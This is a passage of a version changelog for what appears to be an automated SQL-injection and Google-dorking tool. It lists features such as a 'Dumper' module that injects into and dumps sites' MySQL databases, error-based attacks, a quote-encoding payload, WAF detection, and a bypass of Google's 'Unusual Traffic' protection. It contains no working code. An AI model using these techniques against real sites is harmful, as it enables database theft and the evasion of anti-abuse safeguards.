- Add 'forcing' option, additional tests, simple WAF detection ... 37 | - Add 'timeout' option, allows to define a timeout for Requests when reading the received data 38 | - If your list is not empty before detecting 'Unusual Traffic', then the program will go on to the next step 39 | 40 | 41 | [b0.7.2] - (MetaTuring) 42 | - SearchEngine greatly enhanced 43 | - New Google Secure 'Unusual Traffic' Bypass, efficient and stable 44 | - Parsers improve 45 | - some corrections 46 | - removal of 'Spoof-dorks', obselete and become useless 47 | 48 | [b0.6.0] 49 | - Parsers improve 50 | - Fix range() option in bypass mode 51 | - Add the 'Dumper' module, 'naif', MySQL >= 5 Generic. 52 | 53 | [b0.5.0 (dev)] 54 | - Dumper rewrite 55 | - Dumper enhancement> Syntax change during the attack if needed. 56 | 57 | [b0.3.0 (dev)] 58 | - Adding a Module 'Dumper'> tries to inject automatically, via 'a simple SQL attack' if the result is positive then allows 'dump' the database (MySQL> = 5) of the site in question. . 59 | - Simple attack "Error-Based 'Unknown WHERE CLAUSE'" 60 | 61 | [a1.0.7] 62 | - Improved Bypass> added a 'rand_domain', integrate. 63 | - SearchEngine enhancement> 'customdomain' option allows you to manually define a Google domain, by default: '. Com' 64 | - SearchEngine enhancement> option 'range ()' sets the start and end of search 65 | - Various Improvement / Modification ... 66 | - Optimization general ... 67 | 68 | [a.1.0.3] 69 | - Supports Arguments rewritten (flexible, easy to add new module or options ...) 70 | - Add Bypass mode (simple) 71 | - Code optimized 72 | 73 | [a.0.8.0 (dev)] 74 | - Add Bypass mode (primitive) 75 | - Improved SQL Parser 76 | - Quote change from "'" to "%% 2727" 77 | - Improved SearchEngine and Parser 78 | - Improved URLs filter 79 | 80 | [a0.7.5] 81 | - First version shared 82 | - Rewriting code 83 | - Improvement all 84 | 85 | [Prototype (dev)] 86 | - basic functions, primitive ... 87 | 88 | 89 | 90 | --------------------------------------------------------------------------------